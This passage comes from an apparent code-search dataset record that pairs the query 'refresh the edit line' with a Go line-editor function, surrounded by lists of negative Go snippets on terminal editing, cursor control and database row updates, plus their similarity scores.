me.SelectMode())\n\t\t\ttv.SavePosHistory(tv.CursorPos)\n\t\t\ttv.Paste()\n\t\t}\n\tcase mouse.Right:\n\t\tif me.Action == mouse.Press {\n\t\t\tme.SetProcessed()\n\t\t\ttv.SetCursorFromMouse(pt, newPos, me.SelectMode())\n\t\t\ttv.EmitContextMenuSignal()\n\t\t\ttv.This().(gi.Node2D).ContextMenu()\n\t\t}\n\t}\n}", "func (this *LCD) LeftToRight() {\n\tthis.mode |= LCD_ENTRYLEFT\n\tthis.command(LCD_ENTRYMODESET | this.mode)\n}", "func GuiEnableTooltip() {\n\tC.GuiEnableTooltip()\n}", "func (w *VT100Writer) SaveCursor() {\n\t//fmt.Fprintln(os.Stderr, \"\\x1b[33;1mSCP\\x1b[m\")\n\tw.WriteRaw([]byte{0x1b, '[', 's'})\n}", "func advanceScreen(rows int) {\n\tsetCursorRow(terminalHeight)\n\tfmt.Print(strings.Repeat(lineBreak, rows))\n}", "func (v *Filter) KeyHelp() string {\n\treturn format.StatusControlNormal(\"▏Type to filter the file tree \")\n}", "func CursorPrevLine(r uint) {\n\temitEscape(\"F\", r)\n}" ]
[ "0.6077438", "0.60423", "0.60144335", "0.5872064", "0.57536685", "0.56957555", "0.5690847", "0.5627629", "0.556421", "0.556421", "0.5455736", "0.5433945", "0.5396354", "0.53862804", "0.5341166", "0.5299029", "0.52494884", "0.5230935", "0.51621526", "0.51560223", "0.5151575", "0.51424026", "0.5138222", "0.51024276", "0.50761795", "0.50631285", "0.50543517", "0.4950822", "0.4944147", "0.49424106", "0.49416658", "0.49204752", "0.49178696", "0.48965514", "0.4894216", "0.4861986", "0.4816108", "0.48009714", "0.47954458", "0.47835952", "0.47835952", "0.47765294", "0.4754568", "0.47401866", "0.47369146", "0.4722382", "0.47217485", "0.4718698", "0.4718698", "0.46557567", "0.46375018", "0.46189687", "0.4595805", "0.45848966", "0.45844945", "0.45837808", "0.45752907", "0.45728275", "0.45623603", "0.4560818", "0.4549025", "0.45402244", "0.45362267", "0.45338148", "0.4533445", "0.4522477", "0.45190012", "0.4512845", "0.45049232", "0.45047608", "0.45026916", "0.4501481", "0.4501481", "0.44959342", "0.44938862", "0.4490417", "0.4488953", "0.44836628", "0.4483475", "0.44815975", "0.4477611", "0.4476307", "0.4468129", "0.44667307", "0.44667307", "0.44664955", "0.4463248", "0.4461323", "0.4459012", "0.44564447", "0.44479594", "0.444776", "0.44465798", "0.44441086", "0.44414562", "0.44400597", "0.44395795", "0.44356623", "0.44279033", "0.44263294" ]
0.5885805
3
refresh the edit line
func (ls *linestate) refreshLine() { if ls.ts.mlmode { ls.refreshMultiline() } else { ls.refreshSingleline() } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func Edit(defval, prompt string, refresh func(int, int)) string {\n\treturn EditDynamicWithCallback(defval, prompt, refresh, nil)\n}", "func (ls *linestate) editDelete() {\n\tif len(ls.buf) > 0 && ls.pos < len(ls.buf) {\n\t\tls.buf = append(ls.buf[:ls.pos], ls.buf[ls.pos+1:]...)\n\t\tls.refreshLine()\n\t}\n}", "func edit(c *cli.Context) {\n\tlines := content()\n\n\targLen := len(c.Args())\n\n\tvar ind int\n\n\tswitch argLen {\n\tcase 0:\n\t\tind = 0\n\tcase 1:\n\t\tind, _ = strconv.Atoi(c.Args()[0])\n\tdefault:\n\t\tpanic(1)\n\t}\n\n\tselectedLine := lines[ind]\n\tlineArr := strings.Split(selectedLine, \" \")\n\n\tenv := os.Environ()\n\tvimBin, err := exec.LookPath(\"vim\")\n\tcheck(err)\n\n\tplusCmd := fmt.Sprint(\"+\", lineArr[0])\n\tplussCmd := []string{\"vim\", lineArr[1], plusCmd}\n\n\tdebug(\"Whole cmd: %v Index: %v\", plussCmd, c.Args()[0])\n\n\tif true {\n\t\texecErr := syscall.Exec(vimBin, plussCmd, env)\n\t\tcheck(execErr)\n\t}\n}", "func (l *Linenoise) edit(ifd, ofd int, prompt, init string) (string, error) {\n\t// create the line state\n\tls := newLineState(ifd, ofd, prompt, l)\n\t// set and output the initial line\n\tls.editSet(init)\n\t// The latest history entry is always our current buffer\n\tl.HistoryAdd(ls.String())\n\n\tu := utf8{}\n\n\tfor {\n\t\tr := u.getRune(syscall.Stdin, nil)\n\t\tif r == KeycodeNull {\n\t\t\tcontinue\n\t\t}\n\t\t// Autocomplete when the callback is set.\n\t\t// It returns the character to be handled next.\n\t\tif r == KeycodeTAB && l.completionCallback != nil {\n\t\t\tr = ls.completeLine()\n\t\t\tif r == KeycodeNull {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t}\n\t\tif r == KeycodeCR || r == l.hotkey {\n\t\t\tl.historyPop(-1)\n\t\t\tif l.hintsCallback != nil {\n\t\t\t\t// Refresh the line without hints to leave the\n\t\t\t\t// line as the user typed it after the newline.\n\t\t\t\thcb := l.hintsCallback\n\t\t\t\tl.hintsCallback = nil\n\t\t\t\tls.refreshLine()\n\t\t\t\tl.hintsCallback = hcb\n\t\t\t}\n\t\t\ts := ls.String()\n\t\t\tif r == l.hotkey {\n\t\t\t\treturn s + string(l.hotkey), nil\n\t\t\t}\n\t\t\treturn s, nil\n\t\t} else if r == KeycodeBS {\n\t\t\t// backspace: remove the character to the left of the cursor\n\t\t\tls.editBackspace()\n\n\t\t} else if r == KeycodeESC {\n\t\t\tif wouldBlock(ifd, &timeout20ms) {\n\t\t\t\t// looks like a single escape- abandon the line\n\t\t\t\tl.historyPop(-1)\n\t\t\t\treturn \"\", nil\n\t\t\t}\n\t\t\t// escape sequence\n\t\t\ts0 := u.getRune(ifd, &timeout20ms)\n\t\t\ts1 := u.getRune(ifd, &timeout20ms)\n\t\t\tif s0 == '[' {\n\t\t\t\t// ESC [ sequence\n\t\t\t\tif s1 >= '0' && s1 <= '9' {\n\t\t\t\t\t// Extended escape, read additional byte.\n\t\t\t\t\ts2 := u.getRune(ifd, &timeout20ms)\n\t\t\t\t\tif s2 == '~' {\n\t\t\t\t\t\tif s1 == '3' {\n\t\t\t\t\t\t\t// delete\n\t\t\t\t\t\t\tls.editDelete()\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t} else {\n\t\t\t\t\tif s1 == 'A' {\n\t\t\t\t\t\t// cursor up\n\t\t\t\t\t\tls.editSet(l.historyPrev(ls))\n\t\t\t\t\t} else if s1 == 'B' {\n\t\t\t\t\t\t// cursor down\n\t\t\t\t\t\tls.editSet(l.historyNext(ls))\n\t\t\t\t\t} else if s1 == 'C' {\n\t\t\t\t\t\t// cursor right\n\t\t\t\t\t\tls.editMoveRight()\n\t\t\t\t\t} else if s1 == 'D' {\n\t\t\t\t\t\t// cursor left\n\t\t\t\t\t\tls.editMoveLeft()\n\t\t\t\t\t} else if s1 == 'H' {\n\t\t\t\t\t\t// cursor home\n\t\t\t\t\t\tls.editMoveHome()\n\t\t\t\t\t} else if s1 == 'F' {\n\t\t\t\t\t\t// cursor end\n\t\t\t\t\t\tls.editMoveEnd()\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t} else if s0 == '0' {\n\t\t\t\t// ESC 0 sequence\n\t\t\t\tif s1 == 'H' {\n\t\t\t\t\t// cursor home\n\t\t\t\t\tls.editMoveHome()\n\t\t\t\t} else if s1 == 'F' {\n\t\t\t\t\t// cursor end\n\t\t\t\t\tls.editMoveEnd()\n\t\t\t\t}\n\t\t\t}\n\t\t} else if r == KeycodeCtrlA {\n\t\t\t// go to the start of the line\n\t\t\tls.editMoveHome()\n\t\t} else if r == KeycodeCtrlB {\n\t\t\t// cursor left\n\t\t\tls.editMoveLeft()\n\t\t} else if r == KeycodeCtrlC {\n\t\t\t// return QUIT\n\t\t\treturn \"\", ErrQuit\n\t\t} else if r == KeycodeCtrlD {\n\t\t\tif len(ls.buf) > 0 {\n\t\t\t\t// delete: remove the character to the right of the cursor.\n\t\t\t\tls.editDelete()\n\t\t\t} else {\n\t\t\t\t// nothing to delete - QUIT\n\t\t\t\tl.historyPop(-1)\n\t\t\t\treturn \"\", ErrQuit\n\t\t\t}\n\t\t} else if r == KeycodeCtrlE {\n\t\t\t// go to the end of the line\n\t\t\tls.editMoveEnd()\n\t\t} else if r == KeycodeCtrlF {\n\t\t\t// cursor right\n\t\t\tls.editMoveRight()\n\t\t} else if r == KeycodeCtrlH {\n\t\t\t// backspace: remove the character to the left of the cursor\n\t\t\tls.editBackspace()\n\t\t} else if r == KeycodeCtrlK {\n\t\t\t// delete to the end of the line\n\t\t\tls.deleteToEnd()\n\t\t} else if r == KeycodeCtrlL {\n\t\t\t// clear screen\n\t\t\tclearScreen()\n\t\t\tls.refreshLine()\n\t\t} else if r == KeycodeCtrlN {\n\t\t\t// next history item\n\t\t\tls.editSet(l.historyNext(ls))\n\t\t} else if r == KeycodeCtrlP {\n\t\t\t// previous history item\n\t\t\tls.editSet(l.historyPrev(ls))\n\t\t} else if r == KeycodeCtrlT {\n\t\t\t// swap current character with the previous\n\t\t\tls.editSwap()\n\t\t} else if r == KeycodeCtrlU {\n\t\t\t// delete the whole line\n\t\t\tls.deleteLine()\n\t\t} else if r == KeycodeCtrlW {\n\t\t\t// delete previous word\n\t\t\tls.deletePrevWord()\n\t\t} else {\n\t\t\t// insert the character into the line buffer\n\t\t\tls.editInsert(r)\n\t\t}\n\t}\n}", "func (c *Console) EditRow(id Row, text string) <-chan struct{} {\n\tch := make(chan struct{})\n\tc.jobs <- func() {\n\t\tdiff := c.rowCount - int(id)\n\t\tfmt.Fprintf(c.File, \"%c[%dA\", 27, diff)\n\t\tfmt.Fprintf(c.File, \"\\r%c[2K\", 27)\n\t\tfmt.Fprintf(c.File, \"%s\\n\", strings.TrimSpace(text))\n\t\tfmt.Fprintf(c.File, \"%c[%dB\", 27, diff)\n\t\tclose(ch)\n\t}\n\treturn ch\n}", "func (ls *linestate) editSwap() {\n\tif ls.pos > 0 && ls.pos < len(ls.buf) {\n\t\ttmp := ls.buf[ls.pos-1]\n\t\tls.buf[ls.pos-1] = ls.buf[ls.pos]\n\t\tls.buf[ls.pos] = tmp\n\t\tif ls.pos != len(ls.buf)-1 {\n\t\t\tls.pos++\n\t\t}\n\t\tls.refreshLine()\n\t}\n}", "func (ls *linestate) editSet(s string) {\n\tls.buf = []rune(s)\n\tls.pos = len(ls.buf)\n\tls.refreshLine()\n}", "func (ls *linestate) editInsert(r rune) {\n\tls.buf = append(ls.buf[:ls.pos], append([]rune{r}, ls.buf[ls.pos:]...)...)\n\tls.pos++\n\tls.refreshLine()\n}", "func (tb *TextBuf) EditDone() {\n\ttb.AutoSaveDelete()\n\ttb.ClearChanged()\n\ttb.LinesToBytes()\n\ttb.TextBufSig.Emit(tb.This(), int64(TextBufDone), tb.Txt)\n}", "func (ls *linestate) editMoveRight() {\n\tif ls.pos != len(ls.buf) {\n\t\tls.pos++\n\t\tls.refreshLine()\n\t}\n}", "func (mv *MainView) Edit(v *gocui.View, key gocui.Key, ch rune, mod gocui.Modifier) {\n\tmv.editQuery(v, key, ch, mod)\n\treturn\n}", "func EditCommand(c *cli.Context, i storage.Impl) (n storage.Note, err error) {\n\tnName, err := NoteName(c)\n\tif err != nil {\n\t\treturn n, err\n\t}\n\n\tn, err = i.LoadNote(nName)\n\tif err != nil {\n\t\treturn n, err\n\t}\n\n\tif err := writer.WriteNote(&n); err != nil {\n\t\treturn n, err\n\t}\n\n\tif err := i.SaveNote(&n); err != nil {\n\t\treturn n, err\n\t}\n\n\treturn n, nil\n\n}", "func (mv *MainView) Edit(v *gocui.View, key gocui.Key, ch rune, mod gocui.Modifier) {\n\treturn\n}", "func (mv *MainView) Edit(v *gocui.View, key gocui.Key, ch rune, mod gocui.Modifier) {\n\treturn\n}", "func (ls *linestate) editMoveLeft() {\n\tif ls.pos > 0 {\n\t\tls.pos--\n\t\tls.refreshLine()\n\t}\n}", "func (rec *Record) Edit(editNotes bool) error {\n\n\tline := liner.NewLiner()\n\tdefer line.Close()\n\tline.SetCtrlCAborts(true)\n\n\tpos := -1\n\n\tvar err error\n\tvar editedValue string\n\n\taborted := fmt.Errorf(\"Aborted\")\n\n\tif editedValue, err = line.PromptWithSuggestion(config.TitleLabel, rec.Title, pos); err != nil {\n\t\treturn aborted\n\t}\n\trec.Title = editedValue\n\n\tif editedValue, err = line.PromptWithSuggestion(config.AccountLabel, rec.Account, pos); err != nil {\n\t\treturn aborted\n\t}\n\trec.Account = editedValue\n\n\tif editedValue, err = line.PromptWithSuggestion(config.PasswordLabel, rec.Password, pos); err != nil {\n\t\treturn aborted\n\t}\n\trec.Password = editedValue\n\n\ttagsString := strings.Join(rec.Tags, \", \")\n\n\tif editedValue, err = line.PromptWithSuggestion(config.TagsLabel, tagsString, pos); err != nil {\n\t\treturn aborted\n\t}\n\trec.Tags = tagsStringToArray(editedValue)\n\n\tif editedValue, err = line.PromptWithSuggestion(config.URLLabel, rec.Url, pos); err != nil {\n\t\treturn aborted\n\t}\n\trec.Url = editedValue\n\n\tif editNotes {\n\t\t// handle multi-line notes\n\t\tlog.Info(\"\\n%s\", config.NotesLabel)\n\n\t\tlines := strings.Split(rec.Notes, \"\\n\")\n\n\t\twriteBack := \"\"\n\t\tlineIdx := 0\n\n\t\taborted := false\n\n\t\tfor {\n\t\t\tproposal := \"\"\n\n\t\t\tif lineIdx < len(lines) {\n\t\t\t\tproposal = lines[lineIdx]\n\t\t\t}\n\n\t\t\tinput, err := line.PromptWithSuggestion(\"\", proposal, len(proposal))\n\n\t\t\tif err == io.EOF {\n\t\t\t\tbreak\n\t\t\t}\n\n\t\t\tif err != nil {\n\t\t\t\tlog.Debug(\"Aborted? : %v\", err)\n\t\t\t\taborted = true\n\t\t\t\tbreak\n\t\t\t}\n\n\t\t\twriteBack += input + \"\\n\"\n\t\t\tlineIdx++\n\t\t}\n\n\t\tif !aborted {\n\t\t\trec.Notes = writeBack\n\t\t}\n\t}\n\n\treturn nil\n}", "func (tv *TextView) EditDone() {\n\tif tv.Buf != nil {\n\t\ttv.Buf.EditDone()\n\t}\n\ttv.ClearSelected()\n}", "func (tpl Template) EditRow() error {\n\t_, err := DB.Exec(\n\t\t`UPDATE template SET \n\t\t name = ?,\n\t\t remark = ?,\n\t\t script = ?,\n\t\t package_id_str = ?\n\t\tWHERE\n\t\t id = ?`,\n\t\ttpl.Name,\n\t\ttpl.Remark,\n\t\ttpl.Script,\n\t\ttpl.PackageIDStr,\n\t\ttpl.ID,\n\t)\n\treturn err\n}", "func Edit(w http.ResponseWriter, r *http.Request) {\n\tc := flight.Context(w, r)\n\n\titem, _, err := code.ByID(c.DB, c.Param(\"id\"))\n\tif err != nil {\n\t\tc.FlashErrorGeneric(err)\n\t\tc.Redirect(uri)\n\t\treturn\n\t}\n\n\tv := c.View.New(\"code/edit\")\n\tc.Repopulate(v.Vars, \"amount\")\n\tv.Vars[\"item\"] = item\n\tv.Vars[\"setdate\"] = item.Trans_Datetime.Time.Format(\"2006-01-02\")\n\tv.Render(w, r)\n}", "func (ls *linestate) editMoveEnd() {\n\tif ls.pos != len(ls.buf) {\n\t\tls.pos = len(ls.buf)\n\t\tls.refreshLine()\n\t}\n}", "func (r *FPGAInfoResource) Edit(id string, item FPGAInfoConfig) error {\n\tif err := r.c.ModQuery(\"PUT\", BasePath+FPGAInfoEndpoint+\"/\"+id, item); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (tb *TextBuf) Refresh() {\n\ttb.TextBufSig.Emit(tb.This(), int64(TextBufNew), tb.Txt)\n}", "func (view *ListView) Refresh() {\n\ttermbox.Clear(termbox.ColorBlack, termbox.ColorBlack)\n\tfor y, friend := range view.friends {\n\t\tfor x, c := range friend.Name {\n\t\t\tbgColor := termbox.ColorBlack\n\t\t\tfgColor := termbox.ColorWhite\n\t\t\tif view.curline == y {\n\t\t\t\tbgColor = termbox.ColorMagenta\n\t\t\t}\n\t\t\ttermbox.SetCell(x, y, rune(c), fgColor, bgColor)\n\t\t}\n\t}\n\ttermbox.Flush()\n}", "func (p Project) EditRow() error {\n\t_, err := DB.Exec(\n\t\t`UPDATE project SET \n\t\t group_id = ?,\n\t\t name = ?,\n\t\t url = ?,\n\t\t path = ?,\n\t\t environment = ?,\n\t\t branch = ?,\n\t\t after_pull_script = ?,\n\t\t after_deploy_script = ?,\n\t\t rsync_option = ?\n\t\tWHERE\n\t\t id = ?`,\n\t\tp.GroupID,\n\t\tp.Name,\n\t\tp.URL,\n\t\tp.Path,\n\t\tp.Environment,\n\t\tp.Branch,\n\t\tp.AfterPullScript,\n\t\tp.AfterDeployScript,\n\t\tp.RsyncOption,\n\t\tp.ID,\n\t)\n\treturn err\n}", "func (v FaturasResource) Edit(c buffalo.Context) error {\n\treturn c.Error(404, errors.New(\"not available\"))\n}", "func (c *client) Edit(filename string, update bool, filter Filter) error {\n\tif filename == \"-\" {\n\t\treturn EditStream(c.o.InStream, c.o.OutStream, filename, filter)\n\t}\n\n\tif update {\n\t\treturn UpdateFile(filename, filter)\n\t}\n\n\treturn ReadFile(filename, c.o.OutStream, filter)\n}", "func EditDynamicWithCallback(defval, prompt string, refresh func(int, int), callback func(string, string) string) string {\n\tvar buffer string\n\tvar bufpos, cursor, offset int\n\tif defval == \"\" {\n\t\tbuffer = \"\"\n\t\tbufpos = 0\n\t\tcursor = 0\n\t\toffset = 0\n\t} else {\n\t\tx, _ := termbox.Size()\n\t\tbuffer = defval\n\t\tbufpos = len(buffer)\n\t\tif RunewidthStr(buffer) > x {\n\t\t\tcursor = x - 1\n\t\t\toffset = len(buffer) + 1 - x\n\t\t} else {\n\t\t\toffset = 0\n\t\t\tcursor = RunewidthStr(buffer)\n\t\t}\n\t}\n\tiw := RunewidthStr(prompt + \": \")\n\tfor {\n\t\tbuflen := len(buffer)\n\t\tx, y := termbox.Size()\n\t\tif refresh != nil {\n\t\t\trefresh(x, y)\n\t\t}\n\t\tClearLine(x, y-1)\n\t\tfor iw+cursor >= x {\n\t\t\toffset++\n\t\t\tcursor--\n\t\t}\n\t\tfor iw+cursor < iw {\n\t\t\toffset--\n\t\t\tcursor++\n\t\t}\n\t\tt, _ := trimString(buffer, offset)\n\t\tPrintstring(prompt+\": \"+t, 0, y-1)\n\t\ttermbox.SetCursor(iw+cursor, y-1)\n\t\ttermbox.Flush()\n\t\tev := termbox.PollEvent()\n\t\tif ev.Type != termbox.EventKey {\n\t\t\tcontinue\n\t\t}\n\t\tkey := ParseTermboxEvent(ev)\n\t\tswitch key {\n\t\tcase \"LEFT\", \"C-b\":\n\t\t\tif bufpos > 0 {\n\t\t\t\tr, rs := utf8.DecodeLastRuneInString(buffer[:bufpos])\n\t\t\t\tbufpos -= rs\n\t\t\t\tcursor -= Runewidth(r)\n\t\t\t}\n\t\tcase \"RIGHT\", \"C-f\":\n\t\t\tif bufpos < buflen {\n\t\t\t\tr, rs := utf8.DecodeRuneInString(buffer[bufpos:])\n\t\t\t\tbufpos += rs\n\t\t\t\tcursor += Runewidth(r)\n\t\t\t}\n\t\tcase \"C-a\":\n\t\t\tfallthrough\n\t\tcase \"Home\":\n\t\t\tbufpos = 0\n\t\t\tcursor = 0\n\t\t\toffset = 0\n\t\tcase \"C-e\":\n\t\t\tfallthrough\n\t\tcase \"End\":\n\t\t\tbufpos = buflen\n\t\t\tif RunewidthStr(buffer) > x {\n\t\t\t\tcursor = x - 1\n\t\t\t\toffset = buflen + 1 - x\n\t\t\t} else {\n\t\t\t\toffset = 0\n\t\t\t\tcursor = RunewidthStr(buffer)\n\t\t\t}\n\t\tcase \"C-c\":\n\t\t\tfallthrough\n\t\tcase \"C-g\":\n\t\t\tif callback != nil {\n\t\t\t\tresult := callback(buffer, key)\n\t\t\t\tif result != buffer {\n\t\t\t\t\toffset = 0\n\t\t\t\t\tbuffer, buflen, bufpos, cursor = recalcBuffer(result)\n\t\t\t\t}\n\t\t\t}\n\t\t\treturn defval\n\t\tcase \"RET\":\n\t\t\tif callback != nil {\n\t\t\t\tresult := callback(buffer, key)\n\t\t\t\tif result != buffer {\n\t\t\t\t\toffset = 0\n\t\t\t\t\tbuffer, buflen, bufpos, cursor = recalcBuffer(result)\n\t\t\t\t}\n\t\t\t}\n\t\t\treturn buffer\n\t\tcase \"C-d\":\n\t\t\tfallthrough\n\t\tcase \"deletechar\":\n\t\t\tif bufpos < buflen {\n\t\t\t\tr, rs := utf8.DecodeRuneInString(buffer[bufpos:])\n\t\t\t\tbufpos += rs\n\t\t\t\tcursor += Runewidth(r)\n\t\t\t} else {\n\t\t\t\tif callback != nil {\n\t\t\t\t\tresult := callback(buffer, key)\n\t\t\t\t\tif result != buffer {\n\t\t\t\t\t\toffset = 0\n\t\t\t\t\t\tbuffer, buflen, bufpos, cursor = recalcBuffer(result)\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tfallthrough\n\t\tcase \"DEL\", \"C-h\":\n\t\t\tif buflen > 0 {\n\t\t\t\tif bufpos == buflen {\n\t\t\t\t\tr, rs := utf8.DecodeLastRuneInString(buffer)\n\t\t\t\t\tbuffer = buffer[0 : buflen-rs]\n\t\t\t\t\tbufpos -= rs\n\t\t\t\t\tcursor -= Runewidth(r)\n\t\t\t\t} else if bufpos > 0 {\n\t\t\t\t\tr, rs := utf8.DecodeLastRuneInString(buffer[:bufpos])\n\t\t\t\t\tbuffer = buffer[:bufpos-rs] + buffer[bufpos:]\n\t\t\t\t\tbufpos -= rs\n\t\t\t\t\tcursor -= Runewidth(r)\n\t\t\t\t}\n\t\t\t}\n\t\tcase \"C-u\":\n\t\t\tbuffer = \"\"\n\t\t\tbuflen = 0\n\t\t\tbufpos = 0\n\t\t\tcursor = 0\n\t\t\toffset = 0\n\t\tcase \"M-DEL\":\n\t\t\tif buflen > 0 && bufpos > 0 {\n\t\t\t\tdelto := backwordWordIndex(buffer, bufpos)\n\t\t\t\tbuffer = buffer[:delto] + buffer[bufpos:]\n\t\t\t\tbuflen = len(buffer)\n\t\t\t\tbufpos = delto\n\t\t\t\tcursor = RunewidthStr(buffer[:bufpos])\n\t\t\t}\n\t\tcase \"M-d\":\n\t\t\tif buflen > 0 && bufpos < buflen {\n\t\t\t\tdelto := forwardWordIndex(buffer, bufpos)\n\t\t\t\tbuffer = buffer[:bufpos] + buffer[delto:]\n\t\t\t\tbuflen = len(buffer)\n\t\t\t}\n\t\tcase \"M-b\":\n\t\t\tif buflen > 0 && bufpos > 0 {\n\t\t\t\tbufpos = backwordWordIndex(buffer, bufpos)\n\t\t\t\tcursor = RunewidthStr(buffer[:bufpos])\n\t\t\t}\n\t\tcase \"M-f\":\n\t\t\tif buflen > 0 && bufpos < buflen {\n\t\t\t\tbufpos = forwardWordIndex(buffer, bufpos)\n\t\t\t\tcursor = RunewidthStr(buffer[:bufpos])\n\t\t\t}\n\t\tdefault:\n\t\t\tif utf8.RuneCountInString(key) == 1 {\n\t\t\t\tr, _ := utf8.DecodeLastRuneInString(buffer)\n\t\t\t\tbuffer = buffer[:bufpos] + key + buffer[bufpos:]\n\t\t\t\tbufpos += len(key)\n\t\t\t\tcursor += Runewidth(r)\n\t\t\t}\n\t\t}\n\t\tif callback != nil {\n\t\t\tresult := callback(buffer, key)\n\t\t\tif result != buffer {\n\t\t\t\toffset = 0\n\t\t\t\tbuffer, buflen, bufpos, cursor = recalcBuffer(result)\n\t\t\t}\n\t\t}\n\t}\n}", "func (e *Editor) Line() (string, error) {\n\tif err := e.editReset(); err != nil {\n\t\treturn string(e.Buffer), err\n\t}\nline:\n\tfor {\n\t\tr, _, err := e.In.ReadRune()\n\t\tif err != nil {\n\t\t\treturn string(e.Buffer), err\n\t\t}\n\n\t\tswitch r {\n\t\tcase enter:\n\t\t\tbreak line\n\t\tcase ctrlC:\n\t\t\treturn string(e.Buffer), errors.New(\"try again\")\n\t\tcase backspace, ctrlH:\n\t\t\tif err := e.editBackspace(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlD:\n\t\t\tif len(e.Buffer) == 0 {\n\t\t\t\treturn string(e.Buffer), io.EOF\n\t\t\t}\n\n\t\t\tif err := e.editDelete(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlT:\n\t\t\tif err := e.editSwap(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlB:\n\t\t\tif err := e.editMoveLeft(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlF:\n\t\t\tif err := e.editMoveRight(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlP:\n\t\t\tif err := e.editHistoryPrev(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlN:\n\t\t\tif err := e.editHistoryNext(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlU:\n\t\t\tif err := e.editReset(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlK:\n\t\t\tif err := e.editKillForward(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlA:\n\t\t\tif err := e.editMoveHome(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlE:\n\t\t\tif err := e.editMoveEnd(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlL:\n\t\t\tif err := e.clearScreen(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\n\t\t\tif err := e.refreshLine(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlW:\n\t\t\tif err := e.editDeletePrevWord(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase esc:\n\t\t\tr, _, err := e.In.ReadRune()\n\t\t\tif err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\n\t\t\tswitch r {\n\t\t\tcase '[':\n\t\t\t\tr, _, err := e.In.ReadRune()\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t}\n\n\t\t\t\tswitch r {\n\t\t\t\tcase '0', '1', '2', '4', '5', '6', '7', '8', '9':\n\t\t\t\t\t_, _, err := e.In.ReadRune()\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t}\n\t\t\t\tcase '3':\n\t\t\t\t\tr, _, err := e.In.ReadRune()\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t}\n\n\t\t\t\t\tswitch r {\n\t\t\t\t\tcase '~':\n\t\t\t\t\t\tif err := e.editDelete(); err != nil {\n\t\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\tcase 'A':\n\t\t\t\t\tif err := e.editHistoryPrev(); err != nil {\n\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t}\n\t\t\t\tcase 'B':\n\t\t\t\t\tif err := e.editHistoryNext(); err != nil {\n\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t}\n\t\t\t\tcase 'C':\n\t\t\t\t\tif err := e.editMoveRight(); err != nil {\n\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t}\n\t\t\t\tcase 'D':\n\t\t\t\t\tif err := e.editMoveLeft(); err != nil {\n\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t}\n\t\t\t\tcase 'H':\n\t\t\t\t\tif err := e.editMoveHome(); err != nil {\n\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t}\n\t\t\t\tcase 'F':\n\t\t\t\t\tif err := e.editMoveEnd(); err != nil {\n\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\tcase 'O':\n\t\t\t\tr, _, err := e.In.ReadRune()\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t}\n\n\t\t\t\tswitch r {\n\t\t\t\tcase 'H':\n\t\t\t\t\tif err := e.editMoveHome(); err != nil {\n\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t}\n\t\t\t\tcase 'F':\n\t\t\t\t\tif err := e.editMoveEnd(); err != nil {\n\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\tcase tab:\n\t\t\tif err := e.completeLine(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tdefault:\n\t\t\tif err := e.editInsert(r); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\t}\n\t}\n\n\treturn string(e.Buffer), nil\n}", "func (r *PoolNAPTRResource) Edit(id string, item Pool) error {\n\tif err := r.c.ModQuery(\"PUT\", BasePath+PoolNAPTREndpoint+\"/\"+id, item); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (p Project) EditRow() error {\n\t_, err := sq.\n\t\tUpdate(projectTable).\n\t\tSetMap(sq.Eq{\n\t\t\t\"group_id\": p.GroupID,\n\t\t\t\"name\": p.Name,\n\t\t\t\"url\": p.URL,\n\t\t\t\"path\": p.Path,\n\t\t\t\"environment\": p.Environment,\n\t\t\t\"branch\": p.Branch,\n\t\t\t\"after_pull_script\": p.AfterPullScript,\n\t\t\t\"after_deploy_script\": p.AfterDeployScript,\n\t\t\t\"rsync_option\": p.RsyncOption,\n\t\t\t\"update_time\": 